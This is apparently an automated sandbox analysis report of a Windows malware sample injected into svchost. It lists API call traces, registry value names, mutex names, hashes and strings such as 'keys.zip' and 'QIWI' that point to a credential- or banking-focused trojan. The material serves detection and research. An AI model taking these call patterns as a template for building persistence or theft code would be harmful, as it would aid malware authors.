                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D27CBA
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D27CCF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Valuememset$CloseDeleteFlushOpen
                                                                                                                                                                                                                • String ID: a1633cfca$software\microsoft
                                                                                                                                                                                                                • API String ID: 3377232977-698140376
                                                                                                                                                                                                                • Opcode ID: 747ece956105b7365b254da6cb535cae4ec8790a3a9056be3a326e98edcaff97
                                                                                                                                                                                                                • Instruction ID: 9c0755eee46add208bb08971a7b16765036e55079210f15de74ae6cf8c64b590
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 747ece956105b7365b254da6cb535cae4ec8790a3a9056be3a326e98edcaff97
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9310971940168ABFB30DB749898BEEB7B8EB24308F5055ACE185D7340D2708EC8DFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CopyFileA.KERNEL32(02D7DCB0,02D7DBA8,00000000), ref: 02D3F0D9
                                                                                                                                                                                                                • CopyFileA.KERNEL32(02D7DCB0,02D7DBA8,00000000), ref: 02D3F153
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F15E
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D3F16F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3F176
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F188
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3F199
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • sign.cer, xrefs: 02D3F0FE
                                                                                                                                                                                                                • Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D3F155
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CopyFileHandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                • String ID: Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$sign.cer
                                                                                                                                                                                                                • API String ID: 2434762175-3941987283
                                                                                                                                                                                                                • Opcode ID: 14c512004fee38f4c1a379c41ea71f36c6fcd30c8d0323eb852914031d71a784
                                                                                                                                                                                                                • Instruction ID: 26d03ca34e3813bec5c6f32a0c65070e3941cbb60f63c3d1339923a287844e7b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14c512004fee38f4c1a379c41ea71f36c6fcd30c8d0323eb852914031d71a784
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF31D5309447885FE7139F28E468B977FE1AF56740F298095E8C99B712E774CC04C7A0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D39B08
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D39CC7), ref: 02D39B3F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02D39CC7,a1633fdda,00000000,?,00000000,?), ref: 02D39B5C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02D39CC7), ref: 02D39B66
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D39B99
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,a1633fdda,00000000,?,00000000,?), ref: 02D39BB6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D39BC0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: a1633fdda$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-4110729799
                                                                                                                                                                                                                • Opcode ID: af90f51b533d31605f680ed328bcacbba50c348af7ef2839e5e56fb9bc879475
                                                                                                                                                                                                                • Instruction ID: 883fcd19b5e1d1a4071a642f6fdb7da74f6fe0d87b01c6ede8d292d9626695e0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af90f51b533d31605f680ed328bcacbba50c348af7ef2839e5e56fb9bc879475
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5213375E40209FBEB00DBA4DC99FEEBBB8EF48704F504599E501E6240E7B4AA45CF90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D23608
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D35686), ref: 02D2363F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02D35686,a1633e4fa,00000000,?,00000000,?), ref: 02D2365C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02D35686), ref: 02D23666
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D23699
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,a1633e4fa,00000000,?,00000000,?), ref: 02D236B6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D236C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: a1633e4fa$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-77370241
                                                                                                                                                                                                                • Opcode ID: a367ef1daa22608c680cf8c04b1c0ae45f0b6e77a4858b27bce6c487c0cd8e0f
                                                                                                                                                                                                                • Instruction ID: cc00a0cbd241b432885b748d337003432f01014fe78ac6479091a1882a5b7b59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a367ef1daa22608c680cf8c04b1c0ae45f0b6e77a4858b27bce6c487c0cd8e0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1215375E40219FBEB00DBA4DC99FFEBBB8EF48705F504559E501E6240E7B4AA44CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D3F9BC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D3F9C5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F9D9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3F9EB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F9F6
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc163,HANDY), ref: 02D3FA10
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D3FA16
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 5e8dc163$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
                                                                                                                                                                                                                • API String ID: 4280258085-1532886009
                                                                                                                                                                                                                • Opcode ID: 2c059c74de555c74218079cb60cd362dacb5b771e5340c2ba9fd785a18b8c820
                                                                                                                                                                                                                • Instruction ID: 25f0f7e772ba6d62ce9f948805ade5bdafc1e23e75fe50b3d6b89bea1313d81b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c059c74de555c74218079cb60cd362dacb5b771e5340c2ba9fd785a18b8c820
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F08232E883157EE3226B60EC0EB5E77946F06B49F144504F986A1340DBF88C588BB2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D42EFC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D42F05
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D42F19
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D42F2B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42F36
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5E8DC473,RFK), ref: 02D42F50
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D42F56
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                • String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                                • API String ID: 4280258085-3548839560
                                                                                                                                                                                                                • Opcode ID: c84c3b66865bed0a570e085ffc556879d378d498ece9dff0b820114a671668b1
                                                                                                                                                                                                                • Instruction ID: eeeac634d657d7eb72b6423f7d86f7857c9b2982d0ef9fcbc8103c63f39fbd29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c84c3b66865bed0a570e085ffc556879d378d498ece9dff0b820114a671668b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35F082319883116BF2216B61AC0DB1E37946F05B05F904514FD86A2381DBB49D598AB2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$_snprintf
                                                                                                                                                                                                                • String ID: 0$%x$Content-Length
                                                                                                                                                                                                                • API String ID: 4125937431-3838797520
                                                                                                                                                                                                                • Opcode ID: e9a6164b574e81eab560cf1b211402d584533978d6fee3124352570322dd306c
                                                                                                                                                                                                                • Instruction ID: 70a5f024987cd7a7b4ca0cbe84527a356535de874425bd6a4bdc0207a409b594
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9a6164b574e81eab560cf1b211402d584533978d6fee3124352570322dd306c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D9163B1604716AFC714DF68D89496AB3B9FF98318B048E29E95987B40D770EC18CBE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75B0A250,?,02D338A8,?), ref: 02D492E3
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D492E6
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D492FB
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02D338A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D338A8,?), ref: 02D49352
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49375
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D338A8,?), ref: 02D49378
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49384
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D338A8,?), ref: 02D49387
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,02D338A8,?), ref: 02D4939A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D4939D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 604365451-0
                                                                                                                                                                                                                • Opcode ID: fd598a42c1807dd904292db8b627625e445b85da0ef4aeb29cb7763402200c2b
                                                                                                                                                                                                                • Instruction ID: 25cc8b65e7aad3b1dff6cd470c04c448328f83bbd95289363e82f32f1c7336fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd598a42c1807dd904292db8b627625e445b85da0ef4aeb29cb7763402200c2b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 893170B19413019FD7309F66989CB57BBE8FB59718F44893EE2C987681C7709C80CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B623
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2B650
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2B657
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2B669
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D2B678
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2B682
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B694
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D2B6C1
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2B6C8
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,?), ref: 02D2B6DB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2596333622-0
                                                                                                                                                                                                                • Opcode ID: ab359186f5ea7d00d57ca9f3a0525d56bc9de245b8c251ae5310cb7d4af60b8a
                                                                                                                                                                                                                • Instruction ID: 01405dc7d724379157eebf39255dd9811b93ceab479466f2017eee594fc1e925
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab359186f5ea7d00d57ca9f3a0525d56bc9de245b8c251ae5310cb7d4af60b8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66217F31A802109FC7108F59F84CEEABBE8EB59B25B544976F505CB391C7B45CA1CBB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43ED7
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D19C,?,?), ref: 02D43F69
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D43FF5
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D44006
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D4400D
                                                                                                                                                                                                                  • Part of subcall function 02D45580: GetHandleInformation.KERNEL32(?,00000000), ref: 02D45594
                                                                                                                                                                                                                  • Part of subcall function 02D45580: CloseHandle.KERNEL32(?), ref: 02D455A5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 3621236684-558722157
                                                                                                                                                                                                                • Opcode ID: 529bc0add5eb58a6fd5bd0b2c380fa1e3bbb5865caed323ab6de069d60a57639
                                                                                                                                                                                                                • Instruction ID: 8ca3afcab20d60731841f36eb7860715dff70eb2b34fbd9569d7977c8fb3390c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 529bc0add5eb58a6fd5bd0b2c380fa1e3bbb5865caed323ab6de069d60a57639
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F41FC3194469A4FDB168B2CA4387EA7BF2AF4A300F2546D5D8C9D7341EF719D48CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D34214
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000104,software\microsoft,00000000,00000101,80000002,?,76EEC3F0,00000000), ref: 02D34237
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,?,76EEC3F0,00000000), ref: 02D3425A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,76EEC3F0,00000000), ref: 02D342CD
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,76EEC3F0,00000000), ref: 02D342D4
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D342E4
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000002,?,76EEC3F0,00000000), ref: 02D34312
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 4043890984-3673152959
                                                                                                                                                                                                                • Opcode ID: e3e9b54d30dcf1980a7c64da2b3f59cba634dc48b326beb64c7c29b945d052d7
                                                                                                                                                                                                                • Instruction ID: 3603a98359ee13b13944c9a52d641273c268b875cbcca58f9818422a87f404ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3e9b54d30dcf1980a7c64da2b3f59cba634dc48b326beb64c7c29b945d052d7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31E636D00219ABCB22CB65E858FDB7BB8FB85704F148194E995A7300D774DE49CBE0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41990,00000000,00000000,00000000), ref: 02D41AF4
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D41B05
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41B0E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D41B20
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41B31
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3D7), ref: 02D41B3C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$BackslashCloseCreateInformationObjectPathSingleSleepThreadWait
                                                                                                                                                                                                                • String ID: 5E8DC3D7$QIWI
                                                                                                                                                                                                                • API String ID: 197911262-1061010709
                                                                                                                                                                                                                • Opcode ID: 29d046254908d307533eb73e8c51934b50338cc1cab034c2c0a152420141d505
                                                                                                                                                                                                                • Instruction ID: 5a918e0c8684f4a2ed53f6c0f93b9397780ae8d6adef116a0ecccd6bdaf274c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d046254908d307533eb73e8c51934b50338cc1cab034c2c0a152420141d505
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4F0C231A85318BBF32057A4BD0EF6A37A89B06B55F200641F909A53C0EAE49D6487B5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D39BE7
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D39BF9
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D39E3F,?,02D39E3F), ref: 02D39C13
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(02D39E3F,a1633fdda,00000000,00000004,00000004,00000004,02D39E3F), ref: 02D39C30
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02D39C3A
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D39C44
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                • String ID: a1633fdda$software\microsoft
                                                                                                                                                                                                                • API String ID: 287100044-4110729799
                                                                                                                                                                                                                • Opcode ID: 5558c19d5e5d89a4bffb876685e80476fde2c0934e3a36f97ee2fcf1d8294308
                                                                                                                                                                                                                • Instruction ID: af5e85812bee44f124eda190068077a9d4127b2be0c7a5dc3a2d94abe5046bbc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5558c19d5e5d89a4bffb876685e80476fde2c0934e3a36f97ee2fcf1d8294308
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F03175D80218FBE710DBA0EC5DF9E7778AB08701F504554FA02A2340D6749E548AF1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D333A7
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D333B9
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D3581A,?,02D3581A), ref: 02D333D3
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(02D3581A,A1633F95a,00000000,00000004,00000004,00000004,02D3581A), ref: 02D333F0
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02D333FA
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02D33404
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
